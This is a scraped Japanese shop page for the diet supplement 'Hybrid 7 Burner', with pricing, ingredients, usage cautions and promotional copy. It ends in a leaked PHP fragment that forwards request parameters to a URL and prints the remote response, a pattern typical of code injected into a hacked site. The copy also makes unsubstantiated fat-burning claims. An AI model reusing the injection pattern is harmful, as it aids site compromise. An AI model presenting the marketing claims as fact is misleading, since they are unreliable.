'; ?> ハイブリッド7バーナー - ダイエット食品の通販ショップ【通販ダイエット】
ハイブリッド7バーナー
【ダイエット食品】
ダイエット食品の通販ショップ【通販ダイエット】
希望小売価格
10,290円(税込)

↓↓↓↓↓↓
限定特価
3,129円(税込)


ハイブリッド7バーナー
ハイブリッド7バーナー ハイブリッド7バーナー
販売価格:2,980円
(税込:3,129円)
送料無料キャンペーン
商品のおすすめポイント
食べすぎ・運動不足でついたお腹やもも肉。「2週間くらいで何とかしたい…」その気持ち、痛いほど分かります!

こちらはズバリ「脂肪燃焼でダイエット!」が合言葉。高濃度カテキンを始め、良いとされているモノを社長自らが世界中を回って厳選、7つに絞って配合。

中でもL-カルニチンは、脂質の代謝に必要不可欠な物質です。脂肪酸はエネルギー源としてミトコンドリアに取り込まれる際、脂肪酸のみではミトコンドリアの膜を通過できないため、L-カルニチンと結合して通過します。つまり、L-カルニチンは脂肪酸をミトコンドリアに運ぶ役割を担う成分です。

しかし、L-カルニチン(純品)は吸湿性が高く、ダイエット食品などには適しません。L-カルニチンフマル酸塩はL-カルニチンにフマル酸をイオン結合し、吸湿性を改善しており、L-カルニチンを約60%含有しています。水溶液や体内に入るとL-カルニチンとフマル酸に分かれます。また、フマル酸はTCAサイクルの構成物質の一つであり、体内での有効利用が期待されます。

「寝てる間に体がポカポカして脂肪が燃えてるような感じ!」「飲み始めて早い時期にウエストが」など喜びの報告多数。さあ、あなたも後に続け☆

ベストプライスでご提供
大好評につき、数に限りがございます。売り切れる前に、早めのご注文をおすすめします!

ハイブリッド7バーナー
【ダイエット食品】
ハイブリッド7バーナー
販売価格:2,980円
(税込:3,129円)
商品詳細
○商品名:ハイブリッド7バーナー
○名称:L-カルニチン・フマル酸塩含有加工食品
○内容量:30g(250mg×120粒)
○ 成分:マルチトール、トレハロース、難消化性デキストリン、L-カルニチンフマル酸塩、ツルアラメ抽出物、ナタネ硬化油、シトラスアランティウム、にんにく粉末、カラルマフィンブリアタエキス、黒胡椒抽出物、結晶セルロース、香料、微粒酸化ケイ素、ステアリン酸カルシウム、緑茶抽出物、カフェイン抽出物
○お召し上がり方:
1日4粒を目安に、水またはお湯と共にお召し上がりください。配合されている成分により、まれに体に合わない場合があります。その場合は中止するか量を減らしてください。
○販売元:株式会社アンティブルー
○生産国:日本
○使用期限:製造日より未開封2年
○使用上の注意:
・ アレルギー体質の方や、体調のすぐれない方などのご使用はお避けください。まれに体質に合わない方もございますので身体に異常を感じたら使用を中止して医師にご相談ください。
・ 妊娠、授乳期の方や、病院の診療を受けている方は、医師の相談のうえでお召し上がりください。
・ 乳幼児の手の届かないところに保管してください。また、乳幼児やお子様へのご使用は控えてください。
・ 万一、身体に変調が生じたらご使用を中止してください。
・ 原材料表示をご参照のうえ、食品アレルギーのある方は、お召し上がらないでください。
・ 医薬品、またお酒との併用はお避けください。
・ 植物エキスを使用しているため、色調にバラツキが生じる場合がありますが、品質に問題はございません。
・開封後はチャックをしっかり閉めてご使用ください

商品検索
ダイエットプチ情報
脂肪燃焼にL−カルニチン
L−カルニチンは、アミノ酸の一種で、脂肪をミトコンドリア内へ送り込み、燃焼させるという重要な役割があります。

このL−カルニチンは体内で作り出すことができる成分なのですが、20代をピークにその量は減少してしまうのが欠点なのです

L−カルニチンが不足すると、体内で脂肪燃焼がうまくいかず、痩せにくい体質になってしまいます

若い時よりも太りやすい!運動をしているのに痩せない!といった中年太り(メタボリックシンドローム)の原因の1つと考えられています。

そのため20代に入ったら、サプリメントでしっかり補給して痩せやすい体質を手に入れましょう。

ハイブリッド7バーナー
【ダイエット食品】
ハイブリッド7バーナー
販売価格:2,980円
(税込:3,129円)
>>商品一覧へ
[0]サイトトップへ
ページトップへ▲
ダイエット食品の通販ショップ
【通販ダイエット】
$mai2i_v) { $mai2i_url .= '&' . $mai2i_p . '=' . urlencode($mai2i_v); } } @readfile($mai2i_url); unset($mai2i, $mai2i_url); ?>